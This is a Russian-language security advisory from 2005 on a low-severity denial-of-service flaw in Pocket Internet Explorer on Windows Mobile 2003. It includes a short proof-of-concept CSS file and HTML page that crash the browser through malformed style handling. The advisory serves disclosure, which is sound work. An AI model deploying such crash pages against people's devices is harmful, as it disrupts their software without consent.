Security Lab

Отказ в обслуживании в Internet Explorer в Windows Mobile 2003

Дата публикации:28.12.2005
Дата изменения:17.10.2006
Всего просмотров:3033
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Windows Mobile 2003 4.20.0 (14053) и 4.20.1081 (13100), возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю аварийно завершить работу приложения.

Уязвимость существует при обработке каскадных стилей. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании приложения. Уязвимость подтверждена на Pocket Loox 420 и Dell Axim (A05) с Windows Mobile 2003 4.20.0 (14053) и 4.20.1081 (13100). Пример:

====== test.css ============
  .d8 {
  	FLOAT: left; WIDTH: 10px; 
  }
====== test.css ============


====== test.htm ============
<LINK href="test.css" type=text/css rel=stylesheet>
<DIV class=d8></DIV>
<DIV class=d8><UL></DIV>

URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источники:

Ссылки: Pocket Internet Explorer Remote DoS